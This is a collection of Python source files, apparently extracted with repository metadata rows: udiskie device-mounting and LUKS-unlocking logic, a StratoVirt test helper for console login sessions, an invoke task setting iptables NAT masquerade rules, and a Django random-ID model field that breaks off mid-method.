    return asynchronous results (Coroutine objects), not plain booleans.

    :ivar udisks: adapter to the udisks service

    NOTE: The optional parameters are not guaranteed to keep their order and
    should always be passed as keyword arguments.
    """
def __init__(self, udisks,
             mount_options=None,
             ignore_device=None,
             prompt=None,
             browser=None,
             cache=None):
    """
    Initialize mounter with the given defaults.

    :param udisks: udisks service object. May be a Sniffer or a Daemon.
    :param callable mount_options: device -> mount options (or None)
    :param FilterMatcher ignore_device: decides device handleability
    :param callable prompt: retrieve passwords for devices
    :param callable browser: open devices
    :param cache: optional mapping used to remember device passwords

    If prompt is None, device unlocking will not work.
    If browser is None, browse will not work.
    """
    self.udisks = udisks
    self._mount_options = mount_options or (lambda device: None)
    self._ignore_device = ignore_device or FilterMatcher([], False)
    # Always ignore devices that are not external block devices or are
    # explicitly marked as ignored, in addition to user filters:
    self._ignore_device._filters += [
        IgnoreDevice({'is_block': False, 'ignore': True}),
        IgnoreDevice({'is_external': False, 'ignore': True}),
        IgnoreDevice({'is_ignored': True, 'ignore': True})]
    self._prompt = prompt
    self._browser = browser
    self._cache = cache
    self._log = logging.getLogger(__name__)
    try:
        # propagate error messages to UDisks1 daemon for 'Job failed'
        # notifications.
        self._set_error = self.udisks.set_error
    except AttributeError:
        # Backend without set_error support: ignore error propagation.
        self._set_error = lambda device, action, message: None
def _error(self, fn, device, err, fmt):
    """Errback: log a failed operation and forward it to the daemon."""
    message = exc_message(err)
    self._log.error(_('failed to {0} {1}: {2}',
                      fn.__name__, device, message))
    self._set_error(device, fn.__name__, message)
    # Returning True marks the error as handled.
    return True
@_sets_async_error
@_find_device
def browse(self, device):
    """
    Browse device.

    :param device: device object, block device path or mount path
    :returns: success
    :rtype: bool

    Requires the device to be mounted and a browser program configured.
    """
    # ``yield Return(x)`` terminates the coroutine with result x.
    if not device.is_mounted:
        self._log.error(_("not browsing {0}: not mounted", device))
        yield Return(False)
    if not self._browser:
        self._log.error(_("not browsing {0}: no program", device))
        yield Return(False)
    # Open the first of possibly several mount points.
    self._log.debug(_('opening {0} on {0.mount_paths[0]}', device))
    self._browser(device.mount_paths[0])
    self._log.info(_('opened {0} on {0.mount_paths[0]}', device))
    yield Return(True)
# mount/unmount
@_sets_async_error
@_find_device
def mount(self, device):
    """
    Mount the device if not already mounted.

    :param device: device object, block device path or mount path
    :returns: whether the device is mounted.
    :rtype: bool
    """
    if not self.is_handleable(device) or not device.is_filesystem:
        self._log.warn(_('not mounting {0}: unhandled device', device))
        yield Return(False)
    if device.is_mounted:
        # Idempotent: already mounted counts as success.
        self._log.info(_('not mounting {0}: already mounted', device))
        yield Return(True)
    fstype = str(device.id_type)
    # User-configured mount options (may be None for defaults).
    options = self._mount_options(device)
    kwargs = dict(fstype=fstype, options=options)
    self._log.debug(_('mounting {0} with {1}', device, kwargs))
    mount_path = yield device.mount(**kwargs)
    self._log.info(_('mounted {0} on {1}', device, mount_path))
    yield Return(True)
@_sets_async_error
@_find_device
def unmount(self, device):
    """
    Unmount a Device if mounted.

    :param device: device object, block device path or mount path
    :returns: whether the device is unmounted
    :rtype: bool
    """
    if not self.is_handleable(device) or not device.is_filesystem:
        self._log.warn(_('not unmounting {0}: unhandled device', device))
        yield Return(False)
    if not device.is_mounted:
        # Idempotent: already unmounted counts as success.
        self._log.info(_('not unmounting {0}: not mounted', device))
        yield Return(True)
    self._log.debug(_('unmounting {0}', device))
    yield device.unmount()
    self._log.info(_('unmounted {0}', device))
    yield Return(True)
# unlock/lock (LUKS)
@_sets_async_error
@_find_device
def unlock(self, device):
    """
    Unlock the device if not already unlocked.

    :param device: device object, block device path or mount path
    :returns: whether the device is unlocked
    :rtype: bool

    Tries a cached password first, then falls back to prompting.
    """
    if not self.is_handleable(device) or not device.is_crypto:
        self._log.warn(_('not unlocking {0}: unhandled device', device))
        yield Return(False)
    if device.is_unlocked:
        self._log.info(_('not unlocking {0}: already unlocked', device))
        yield Return(True)
    if not self._prompt:
        self._log.error(_('not unlocking {0}: no password prompt', device))
        yield Return(False)
    # First attempt: cached password (silent on failure).
    unlocked = yield self._unlock_from_cache(device)
    if unlocked:
        yield Return(True)
    # Second attempt: ask the user; None means the prompt was cancelled.
    password = yield self._prompt(device)
    if password is None:
        self._log.debug(_('not unlocking {0}: cancelled by user', device))
        yield Return(False)
    self._log.debug(_('unlocking {0}', device))
    yield device.unlock(password)
    # Remember the working password for future unlocks.
    self._update_cache(device, password)
    self._log.info(_('unlocked {0}', device))
    yield Return(True)
@Coroutine.from_generator_function
def _unlock_from_cache(self, device):
    """Try to unlock *device* using a cached password.

    :returns: True on success; False when there is no cache, no cached
        entry, or the cached password no longer works.
    """
    if not self._cache:
        yield Return(False)
    try:
        password = self._cache[device]
    except KeyError:
        yield Return(False)
    self._log.debug(_('unlocking {0} using cached password', device))
    try:
        yield device.unlock(password)
    except Exception:
        # Stale/wrong cached password: report failure so the caller can
        # fall back to prompting the user.
        self._log.debug(_('failed to unlock {0} using cached password', device))
        yield Return(False)
    self._log.debug(_('unlocked {0} using cached password', device))
    yield Return(True)
def _update_cache(self, device, password):
    """Remember *password* for *device* if a cache is configured."""
    if not self._cache:
        return
    self._cache[device] = password
def forget_password(self, device):
    """Drop the cached password for *device* (no-op if not cached)."""
    try:
        del self._cache[device]
    except KeyError:
        # Best effort: nothing cached for this device.
        pass
@_sets_async_error
@_find_device
def lock(self, device):
    """
    Lock device if unlocked.

    :param device: device object, block device path or mount path
    :returns: whether the device is locked
    :rtype: bool
    """
    if not self.is_handleable(device) or not device.is_crypto:
        self._log.warn(_('not locking {0}: unhandled device', device))
        yield Return(False)
    if not device.is_unlocked:
        # Idempotent: already locked counts as success.
        self._log.info(_('not locking {0}: not unlocked', device))
        yield Return(True)
    self._log.debug(_('locking {0}', device))
    yield device.lock()
    self._log.info(_('locked {0}', device))
    yield Return(True)
# add/remove (unlock/lock or mount/unmount)
@_suppress_error
@_find_device
def add(self, device, recursive=False):
    """
    Mount or unlock the device depending on its type.

    :param device: device object, block device path or mount path
    :param bool recursive: recursively mount and unlock child devices
    :returns: whether all attempted operations succeeded
    :rtype: bool
    """
    if device.is_filesystem:
        success = yield self.mount(device)
    elif device.is_crypto:
        success = yield self.unlock(device)
        if success and recursive:
            # TODO: update device
            # Recurse into the cleartext device exposed by the unlock.
            success = yield self.add(
                device.luks_cleartext_holder,
                recursive=True)
    elif recursive and device.is_partition_table:
        # Recurse into each partition of this table.
        tasks = []
        for dev in self.get_all_handleable():
            if dev.is_partition and dev.partition_slave == device:
                tasks.append(self.add(dev, recursive=True))
        # TODO: AND results
        success = yield AsyncList(tasks)
    else:
        self._log.info(_('not adding {0}: unhandled device', device))
        yield Return(False)
    yield Return(success)
@_suppress_error
@_find_device
def auto_add(self, device, recursive=False):
    """
    Automatically attempt to mount or unlock a device, but be quiet if the
    device is not supported.

    :param device: device object, block device path or mount path
    :param bool recursive: recursively mount and unlock child devices
    :returns: whether all attempted operations succeeded
    :rtype: bool
    """
    # Unlike add(), unsupported/already-handled devices are a quiet success.
    success = True
    if not self.is_handleable(device):
        pass
    elif device.is_filesystem:
        if not device.is_mounted:
            success = yield self.mount(device)
    elif device.is_crypto:
        # Only unlock when a password prompt is available.
        if self._prompt and not device.is_unlocked:
            success = yield self.unlock(device)
        if success and recursive:
            # TODO: update device
            success = yield self.auto_add(
                device.luks_cleartext_holder,
                recursive=True)
    elif recursive and device.is_partition_table:
        tasks = []
        for dev in self.get_all_handleable():
            if dev.is_partition and dev.partition_slave == device:
                tasks.append(self.auto_add(dev, recursive=True))
        # TODO: AND results
        success = yield AsyncList(tasks)
    else:
        self._log.debug(_('not adding {0}: unhandled device', device))
    yield Return(success)
@_suppress_error
@_find_device
def remove(self, device, force=False, detach=False, eject=False,
           lock=False):
    """
    Unmount or lock the device depending on device type.

    :param device: device object, block device path or mount path
    :param bool force: recursively remove all child devices
    :param bool detach: detach the root drive
    :param bool eject: remove media from the root drive
    :param bool lock: lock the associated LUKS cleartext slave
    :returns: whether all attempted operations succeeded
    :rtype: bool
    """
    if device.is_filesystem:
        success = yield self.unmount(device)
    elif device.is_crypto:
        if force and device.is_unlocked:
            # Remove the cleartext child before locking the container.
            yield self.auto_remove(device.luks_cleartext_holder, force=True)
        success = yield self.lock(device)
    elif force and (device.is_partition_table or device.is_drive):
        # Recursively remove all children of this table/drive.
        tasks = []
        for child in self.get_all_handleable():
            if _is_parent_of(device, child):
                tasks.append(self.auto_remove(
                    child,
                    force=True,
                    detach=detach,
                    eject=eject,
                    lock=lock))
        # TODO: AND results
        success = yield AsyncList(tasks)
    else:
        self._log.info(_('not removing {0}: unhandled device', device))
        success = False
    # if these operations work, everything is fine, we can return True:
    if lock and device.is_luks_cleartext:
        device = device.luks_cleartext_slave
        success = yield self.lock(device)
    if eject:
        success = yield self.eject(device)
    if detach:
        success = yield self.detach(device)
    yield Return(success)
@_suppress_error
@_find_device
def auto_remove(self, device, force=False, detach=False, eject=False,
                lock=False):
    """
    Unmount or lock the device depending on device type.

    Quiet variant of ``remove``: unsupported or already-removed devices
    count as success, and eject/detach are guarded by device capability.

    :param device: device object, block device path or mount path
    :param bool force: recursively remove all child devices
    :param bool detach: detach the root drive
    :param bool eject: remove media from the root drive
    :param bool lock: lock the associated LUKS cleartext slave
    :returns: whether all attempted operations succeeded
    :rtype: bool
    """
    success = True
    if not self.is_handleable(device):
        pass
    elif device.is_filesystem:
        if device.is_mounted:
            success = yield self.unmount(device)
    elif device.is_crypto:
        if force and device.is_unlocked:
            yield self.auto_remove(device.luks_cleartext_holder, force=True)
        if device.is_unlocked:
            success = yield self.lock(device)
    elif force and (device.is_partition_table or device.is_drive):
        tasks = []
        for child in self.get_all_handleable():
            if _is_parent_of(device, child):
                tasks.append(self.auto_remove(
                    child,
                    force=True,
                    detach=detach,
                    eject=eject,
                    lock=lock))
        # TODO: AND results
        success = yield AsyncList(tasks)
    else:
        self._log.debug(_('not removing {0}: unhandled device', device))
    # if these operations work, everything is fine, we can return True:
    if lock and device.is_luks_cleartext:
        device = device.luks_cleartext_slave
        success = yield self.lock(device)
    if eject and device.has_media:
        success = yield self.eject(device)
    if detach and device.is_detachable:
        success = yield self.detach(device)
    yield Return(success)
# eject/detach device
@_sets_async_error
@_find_device
def eject(self, device, force=False):
    """
    Eject a device after unmounting all its mounted filesystems.

    :param device: device object, block device path or mount path
    :param bool force: remove child devices before trying to eject
    :returns: whether the operation succeeded
    :rtype: bool
    """
    if not self.is_handleable(device):
        # BUGFIX: pass ``device`` so the '{0}' placeholder can be filled;
        # the argument was previously missing (cf. detach()).
        self._log.warn(_('not ejecting {0}: unhandled device', device))
        yield Return(False)
    drive = device.drive
    if not (drive.is_drive and drive.is_ejectable):
        self._log.warn(_('not ejecting {0}: drive not ejectable', drive))
        yield Return(False)
    if force:
        # Unmount/lock all children of the drive before ejecting.
        yield self.auto_remove(drive, force=True)
    self._log.debug(_('ejecting {0}', device))
    yield drive.eject()
    self._log.info(_('ejected {0}', device))
    yield Return(True)
@_sets_async_error
@_find_device
def detach(self, device, force=False):
    """
    Detach a device after unmounting all its mounted filesystems.

    :param device: device object, block device path or mount path
    :param bool force: remove child devices before trying to detach
    :returns: whether the operation succeeded
    :rtype: bool
    """
    if not self.is_handleable(device):
        self._log.warn(_('not detaching {0}: unhandled device', device))
        yield Return(False)
    # NOTE(review): uses device.root here while eject() uses device.drive --
    # confirm whether the difference is intentional.
    drive = device.root
    if not drive.is_detachable:
        self._log.warn(_('not detaching {0}: drive not detachable', drive))
        yield Return(False)
    if force:
        # Unmount/lock all children of the drive before detaching.
        yield self.auto_remove(drive, force=True)
    self._log.debug(_('detaching {0}', device))
    yield drive.detach()
    self._log.info(_('detached {0}', device))
    yield Return(True)
# mount_all/unmount_all
def add_all(self, recursive=False):
    """
    Add all handleable devices that are available at start.

    :param bool recursive: recursively mount and unlock child devices
    :returns: whether all attempted operations succeeded
    :rtype: bool
    """
    # TODO: AND results
    return AsyncList([self.auto_add(device, recursive=recursive)
                      for device in self.udisks])
def remove_all(self, detach=False, eject=False, lock=False):
    """
    Remove all filesystems handleable by udiskie.

    Only acts on top-level devices (parent object path '/'); their
    children are removed recursively via ``force=True``.

    :param bool detach: detach the root drive
    :param bool eject: remove media from the root drive
    :param bool lock: lock the associated LUKS cleartext slave
    :returns: whether all attempted operations succeeded
    :rtype: bool
    """
    # TODO: AND results
    tasks = [self.auto_remove(device, force=True, detach=detach,
                              eject=eject, lock=lock)
             for device in self.get_all_handleable()
             if device.parent_object_path == '/']
    return AsyncList(tasks)
# iterate devices
def is_handleable(self, device):
    # TODO: handle paths in first argument
    """
    Check whether this device should be handled by udiskie.

    :param device: device object, block device path or mount path
    :returns: handleability
    :rtype: bool

    Currently this just means that the device is removable and holds a
    filesystem or the device is a LUKS encrypted volume.
    """
    # Delegates to the ignore filters configured in __init__.
    return not self._ignore_device(device)
def is_addable(self, device):
    """
    Check if device can be added with ``auto_add``.
    """
    if not self.is_handleable(device):
        return False
    if device.is_filesystem:
        return not device.is_mounted
    if device.is_crypto:
        return self._prompt and not device.is_unlocked
    if device.is_partition_table:
        # Addable if any of its partitions is addable.
        partitions = (dev for dev in self.get_all_handleable()
                      if dev.partition_slave == device)
        return any(self.is_addable(dev) for dev in partitions)
    return False
def is_removable(self, device):
    """
    Check if device can be removed with ``auto_remove``.
    """
    if not self.is_handleable(device):
        return False
    if device.is_filesystem:
        return device.is_mounted
    if device.is_crypto:
        return device.is_unlocked
    if device.is_partition_table or device.is_drive:
        # Removable if any of its children is removable.
        children = (dev for dev in self.get_all_handleable()
                    if _is_parent_of(device, dev))
        return any(self.is_removable(dev) for dev in children)
    return False
def get_all_handleable(self):
    """
    Enumerate all handleable devices currently known to udisks.

    :returns: handleable devices
    :rtype: iterable

    NOTE: returns only devices that are still valid. This protects from
    race conditions inside udiskie.
    """
    # Lazy filter over the udisks device enumeration.
    return filter(self.is_handleable, self.udisks)
# Data structs containing the menu hierarchy:
# - Device: a node with its child ``branches`` and available ``methods``
# - Action: one invokable method bound to a device, with display label
# - Branch: a labeled group of nodes (not referenced in this module --
#   presumably used by UI consumers; verify)
Device = namedtuple('Device', ['root', 'branches', 'device', 'label', 'methods'])
Action = namedtuple('Action', ['method', 'device', 'label', 'action'])
Branch = namedtuple('Branch', ['label', 'groups'])
class DeviceActions(object):
    """Build the hierarchy of available actions for handleable devices."""

    # Display label template per action name; '{0}' is the device label.
    _labels = {
        'browse': _('Browse {0}'),
        'mount': _('Mount {0}'),
        'unmount': _('Unmount {0}'),
        'unlock': _('Unlock {0}'),
        'lock': _('Lock {0}'),
        'eject': _('Eject {0}'),
        'detach': _('Unpower {0}'),
        'forget_password': _('Clear password for {0}'),
    }
def __init__(self, mounter, actions=None):
    """
    :param mounter: Mounter used to perform the actions
    :param dict actions: optional overrides mapping action name to callable

    FIX: replaced the mutable default argument ``actions={}`` with the
    ``None`` sentinel; passing no argument behaves exactly as before.
    """
    self._mounter = mounter
    # Copy so the caller's mapping is never mutated by setdefault below.
    self._actions = _actions = ({} if actions is None else actions).copy()
    setdefault(_actions, {
        'browse': mounter.browse,
        'mount': mounter.mount,
        'unmount': mounter.unmount,
        'unlock': mounter.unlock,
        'lock': partial(mounter.remove, force=True),
        'eject': partial(mounter.eject, force=True),
        'detach': partial(mounter.detach, force=True),
        'forget_password': mounter.forget_password,
    })
def detect(self, root_device=''):
    """
    Detect all currently known devices.

    :param str root_device: object path of root device to return
    :returns: root of device hierarchy
    :rtype: Device
    """
    # Virtual root node collecting devices whose parent is unknown.
    root = Device(None, [], None, "", [])
    device_nodes = dict(map(self._device_node,
                            self._mounter.get_all_handleable()))
    # insert child devices as branches into their roots:
    for object_path, node in device_nodes.items():
        # Fall back to the virtual root when the parent is not handleable.
        device_nodes.get(node.root, root).branches.append(node)
    if not root_device:
        return root
    return device_nodes[root_device]
def _get_device_methods(self, device):
    """Return an iterable over all available methods the device has.

    Yield order determines menu order: filesystem/crypto actions first,
    then eject/detach.
    """
    if device.is_filesystem:
        if device.is_mounted:
            yield 'browse'
            yield 'unmount'
        else:
            yield 'mount'
    elif device.is_crypto:
        if device.is_unlocked:
            yield 'lock'
        else:
            yield 'unlock'
        # Offer clearing the cached password only if one is cached.
        cache = self._mounter._cache
        if cache and device in cache:
            yield 'forget_password'
    if device.is_ejectable and device.has_media:
        yield 'eject'
    if device.is_detachable:
        yield 'detach'
def _device_node(self, device):
"""Create an empty menu node for the specified device."""
label = device.ui_label
# determine available methods
methods = [Action(method, device,
self._labels[method].format(label),
partial(self._actions[method], device))
for method in self._get_device_methods(device)]
# find the root device:
if device.is_partition:
root = device.partition_slave.object_path
elif device.is_luks_cleartext:
root = device.luks_cleartext_slave.object_path
else:
root = None
# in this first step leave branches empty
return device.object_path, Device(root, [], device, label, methods)
| 36.106569 | 84 | 0.598472 | 2,851 | 24,733 | 5.033322 | 0.118555 | 0.032892 | 0.030801 | 0.019233 | 0.541812 | 0.497003 | 0.45554 | 0.412404 | 0.381045 | 0.35561 | 0 | 0.003295 | 0.312781 | 24,733 | 684 | 85 | 36.159357 | 0.840972 | 0.228399 | 0 | 0.470998 | 0 | 0 | 0.079126 | 0 | 0 | 0 | 0 | 0.010234 | 0 | 1 | 0.078886 | false | 0.044084 | 0.023202 | 0 | 0.176334 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bb9036fe312ab342c1385e92d9bc32ecac511198 | 7,398 | py | Python | tests/hydropper/utils/session.py | ican2002/stratorvirt | b8e9b675ae0fac9e359a2096cc818f92c4f11c30 | [
"MulanPSL-1.0"
] | 66 | 2020-10-27T02:48:24.000Z | 2022-03-05T14:24:08.000Z | tests/hydropper/utils/session.py | ican2002/stratorvirt | b8e9b675ae0fac9e359a2096cc818f92c4f11c30 | [
"MulanPSL-1.0"
] | null | null | null | tests/hydropper/utils/session.py | ican2002/stratorvirt | b8e9b675ae0fac9e359a2096cc818f92c4f11c30 | [
"MulanPSL-1.0"
] | 9 | 2020-12-27T08:06:04.000Z | 2022-02-22T11:28:34.000Z | # Copyright (c) 2021 Huawei Technologies Co.,Ltd. All rights reserved.
#
# StratoVirt is licensed under Mulan PSL v2.
# You can use this software according to the terms and conditions of the Mulan
# PSL v2.
# You may obtain a copy of Mulan PSL v2 at:
# http:#license.coscl.org.cn/MulanPSL2
# THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OF ANY
# KIND, EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
# NON-INFRINGEMENT, MERCHANTABILITY OR FIT FOR A PARTICULAR PURPOSE.
# See the Mulan PSL v2 for more details.
"""Create session"""
import threading
import time
import aexpect
from utils.utils_logging import TestLog
from utils.exception import ConsoleBusyError
from utils.exception import NoConsoleError
from utils.exception import LoginAuthenticationError
from utils.exception import LoginTimeoutError
from utils.exception import LoginProcessTerminatedError
# Module-wide logger shared by the session helpers below.
LOG = TestLog.get_global_log()
def lock(function):
    """
    Serialize access to the console owned by a ConsoleManager.

    Acquire the manager's console lock (non-blocking), run ``function``,
    then release the lock.

    Args:
        function: Function to package.  The wrapped callable must receive
            the ConsoleManager instance as its first positional argument.

    Raises:
        ConsoleBusyError: if another caller already holds the console lock.
    """
    def package(*args, **kwargs):
        console_manager = args[0]
        # Non-blocking acquire: fail fast instead of queueing commands.
        # NOTE: use acquire()/release() -- the Python-2 acquire_lock()/
        # release_lock() aliases do not exist on Python 3 lock objects.
        if console_manager.console_lock.acquire(False) is False:
            raise ConsoleBusyError
        try:
            return function(*args, **kwargs)
        finally:
            console_manager.console_lock.release()
    return package
class ConsoleManager():
    """A class for console session communication pipeline.

    Owns a single console object and serializes access to it through
    ``console_lock`` (see the ``lock`` decorator).  Sessions created by
    :meth:`create_session` delegate all work back to this manager.
    """

    def __init__(self):
        # The wrapped console object; set later via config_console().
        self._console = None
        # Command used by the console to probe guest responsiveness.
        self.status_test_command = None
        # Guards the console against concurrent commands.
        self.console_lock = threading.Lock()

    @lock
    def login_session(self, status_test_command, prompt, username, password, timeout):
        """Login session by handle_session().

        Args:
            status_test_command: command used to check console status.
            prompt: regex matching the guest shell prompt.
            username: login user name.
            password: login password.
            timeout: seconds to wait for each expected output.
        """
        self._console.set_status_test_command(status_test_command)
        # debug=True so login progress is traced in the test log.
        self.handle_session(self._console, username, password, prompt, timeout, True)

    def create_session(self, status_test_command,
                       prompt, username, password, timeout):
        """Return a console session with itself as the manager.

        Raises:
            NoConsoleError: if no console has been configured yet.
        """
        if self._console is None:
            raise NoConsoleError
        self.login_session(status_test_command, prompt, username, password, timeout)
        return ConsoleSession(self)

    def config_console(self, console):
        """Configure console.

        Args:
            console: console object providing the low-level I/O methods.
        """
        self._console = console
        self.status_test_command = self._console.status_test_command

    def close(self):
        """Close console."""
        self._console.close()

    @lock
    def get_func(self, func, *args, **kwargs):
        """
        Get the func provided by a Console.

        Args:
            func: function name (looked up as an attribute on the console
                and called with the remaining arguments).
        """
        _func = getattr(self._console, func)
        return _func(*args, **kwargs)

    @staticmethod
    def handle_session(session, username, password, prompt, timeout=10,
                       debug=False):
        """
        Connect to a remote host (guest) using SSH or Telnet or else.
        Provide answers to each questions.

        Drives the interactive login dialog: repeatedly reads output,
        matches it against the known prompt patterns below, and answers
        until the shell prompt appears or authentication fails.

        Args:
            session: expect-style session with sendline()/read_* methods.
            username: login user name.
            password: login password.
            prompt: regex matching the guest shell prompt (success marker).
            timeout: seconds to wait for each expected output.
            debug: when True, trace progress through LOG.debug.

        Returns:
            All output accumulated during the login dialog.

        Raises:
            LoginAuthenticationError: on repeated or out-of-order prompts.
            LoginTimeoutError: if no known pattern appears in time.
            LoginProcessTerminatedError: if the underlying process dies.
        """
        # Counters detect duplicated prompts (i.e. rejected credentials).
        password_prompt_count = 0
        login_prompt_count = 0
        # One extra empty line is allowed before declaring a timeout.
        last_chance = False
        # Pattern list; the loop below branches on the matched index.
        last_line = [r"[Aa]re you sure",  # continue connect
                     r"[Pp]assword:\s*",  # password:
                     r"(?<![Ll]ast )[Ll]ogin:\s*$",  # login:
                     r"[Ee]nter.*username",  # login:
                     r"[Ee]nter.*password",  # password:
                     prompt,  # prompt
                     r"[Ww]arning"]  # Warning added RSA
        output = ""

        def _continue_connect(debug, session):
            # Answer the SSH host-key confirmation question.
            if debug:
                LOG.debug("Got 'Are you sure...', sending 'yes'")
            session.sendline("yes")

        def _send_passwd(debug, session, password):
            if debug:
                LOG.debug("Got password prompt, sending '%s'",
                          password)
            session.sendline(password)

        def _send_username(debug, session, username):
            if debug:
                LOG.debug("Got username prompt, sending '%s'",
                          username)
            session.send(username)

        while True:
            try:
                # Nudge the console so a pending prompt is re-emitted.
                session.sendline()
                match, text = session.read_until_last_line_matches(last_line, timeout=timeout,
                                                                   internal_timeout=0.5, print_func=None)
                output += text
                if match == 0:  # "Are you sure" -> confirm host key
                    _continue_connect(debug, session)
                    continue
                if match in (1, 4):  # password prompt (either wording)
                    if password_prompt_count == 0:
                        _send_passwd(debug, session, password)
                        password_prompt_count += 1
                        continue
                    # A second password prompt means the password was wrong.
                    raise LoginAuthenticationError("Got password prompt twice", text)
                if match in (2, 3):  # username prompt (either wording)
                    if login_prompt_count == 0 and password_prompt_count == 0:
                        _send_username(debug, session, username)
                        login_prompt_count += 1
                        continue
                    if login_prompt_count > 0:
                        raise LoginAuthenticationError("Got username prompt twice", text)
                    raise LoginAuthenticationError("Got username prompt after password prompt", text)
                if match == 5:  # shell prompt -> login succeeded
                    if debug:
                        LOG.debug("Got shell prompt, logged successfully")
                    break
                if match == 6:  # benign RSA warning, keep waiting
                    if debug:
                        LOG.debug("Got 'Warning added RSA to known host list")
                    continue
            except aexpect.ExpectTimeoutError as err:
                # send a empty line to avoid unexpected login timeout
                # because some message from linux kernel maybe impact match
                if not last_chance:
                    time.sleep(0.5)
                    session.sendline()
                    last_chance = True
                    continue
                raise LoginTimeoutError(err.output)
            except aexpect.ExpectProcessTerminatedError as err:
                raise LoginProcessTerminatedError(err.status, err.output)
        return output
class ConsoleSession():
    """
    Thin proxy over a ConsoleManager representing one logical session.

    All real work is delegated to the manager; this wrapper only tracks
    whether the session has already been closed.
    """

    def __init__(self, manager):
        self.__closed = False
        self.__manager = manager
        self.status_test_command = manager.status_test_command

    def __repr__(self):
        return "console session id <%s>" % id(self)

    def run_func(self, name, *args, **kwargs):
        """
        Execute a console session function by name.

        Args:
            name: function name. available name: is_responsive cmd_output
            cmd_output_safe cmd_status_output cmd_status cmd close send
            sendline sendcontrol send_ctrl set_linesep read_nonblocking
            read_until_output_matches read_until_last_line_matches
            read_until_any_line_matches read_up_to_prompt
        """
        # Any name other than "close" is dispatched straight to the manager.
        if name != "close":
            return self.__manager.get_func(name, *args, **kwargs)
        # Closing twice is a programming error.
        if self.__closed:
            raise RuntimeError("%s is closed." % self)
        self.__manager.close()
        self.__closed = True
        return None
| 36.80597 | 105 | 0.584212 | 791 | 7,398 | 5.288243 | 0.2933 | 0.026297 | 0.040641 | 0.028688 | 0.144394 | 0.041119 | 0.041119 | 0.041119 | 0.027253 | 0 | 0 | 0.006332 | 0.3382 | 7,398 | 200 | 106 | 36.99 | 0.848039 | 0.209922 | 0 | 0.124031 | 0 | 0 | 0.07416 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.116279 | false | 0.131783 | 0.069767 | 0.007752 | 0.263566 | 0.007752 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
bb928d74c6fbac1b81cdf25fa38e1e81ee78a19b | 378 | py | Python | src/tasks/iptable.py | comafire/st-kilda-pier | 7bc9e52124c7223043695b1686db94359b83c085 | [
"Apache-2.0"
] | 8 | 2018-07-18T04:30:08.000Z | 2019-05-25T14:16:52.000Z | src/tasks/iptable.py | comafire/st-kilda-pier | 7bc9e52124c7223043695b1686db94359b83c085 | [
"Apache-2.0"
] | null | null | null | src/tasks/iptable.py | comafire/st-kilda-pier | 7bc9e52124c7223043695b1686db94359b83c085 | [
"Apache-2.0"
] | 2 | 2018-08-03T08:17:20.000Z | 2019-05-25T14:16:54.000Z | from __future__ import with_statement
from invoke import task
import env, utils
@task(help={'eth': "public ethernet device name."})
def masquerade(c, eth):
    """Enable NAT masquerading and forwarding for the public interface."""
    templates = (
        "sudo /sbin/iptables -t nat -A POSTROUTING -o {} -j MASQUERADE",
        "sudo /sbin/iptables -A FORWARD -i {} -j ACCEPT",
    )
    for template in templates:
        utils.run_with_exit(c, template.format(eth))
| 34.363636 | 85 | 0.698413 | 59 | 378 | 4.322034 | 0.576271 | 0.054902 | 0.086275 | 0.14902 | 0.227451 | 0.227451 | 0.227451 | 0.227451 | 0 | 0 | 0 | 0 | 0.164021 | 378 | 10 | 86 | 37.8 | 0.806962 | 0 | 0 | 0.222222 | 0 | 0 | 0.365079 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.333333 | 0 | 0.444444 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
bb9311992acbc6d56c608130a350748dec9c8d2c | 1,116 | py | Python | idfield/fields.py | lis-space/django-idfield | 2e7b06037d22c6c862a2970efdc14b470ca92f3b | [
"MIT"
] | null | null | null | idfield/fields.py | lis-space/django-idfield | 2e7b06037d22c6c862a2970efdc14b470ca92f3b | [
"MIT"
] | null | null | null | idfield/fields.py | lis-space/django-idfield | 2e7b06037d22c6c862a2970efdc14b470ca92f3b | [
"MIT"
] | null | null | null | from django.db import models
import random
class IDField(models.Field):
    """Char field that auto-generates a random ID when the value is empty.

    :param alphabet: characters to draw from; defaults to a readable set
        (no ambiguous 0/O/1/I/l) when ``readable`` is True, otherwise
        lowercase letters plus digits.
    :param readable: select the readable default alphabet.
    """

    def __init__(self, alphabet=None, readable=False, *args, **kwargs):
        # Use setdefault so Django's Field.__init__ also receives the
        # default length; previously only ``kwargs.get`` was used, so the
        # parent constructor overwrote self.max_length with None whenever
        # the caller did not pass max_length explicitly.
        kwargs.setdefault('max_length', 10)
        self.max_length = kwargs['max_length']
        self.readable = readable
        self.alphabet = alphabet
        if not self.alphabet:
            if self.readable:
                self.alphabet = "ABCDEFGHJKMNPQRSTUVWXYZ23456789"
            else:
                self.alphabet = "abcdefghijklmnopqrstuvwxyz0123456789"
        super(IDField, self).__init__(*args, **kwargs)

    def db_type(self, connection):
        # Fixed-width column sized to the generated ID length.
        return 'char({})'.format(self.max_length)

    def pre_save(self, model_instance, add):
        """Generate and store a random ID if no value is set yet."""
        value = super(IDField, self).pre_save(model_instance, add)
        if not value:
            # NOTE: random (not secrets) -- IDs are not security tokens.
            value = ''.join(random.choice(self.alphabet)
                            for _ in range(self.max_length))
            setattr(model_instance, self.attname, value)
        return value

    def formfield(self, **kwargs):
        return super(IDField, self).formfield(**kwargs)

    def deconstruct(self):
        # Include the custom constructor kwargs so migrations can
        # faithfully recreate the field (they were previously dropped).
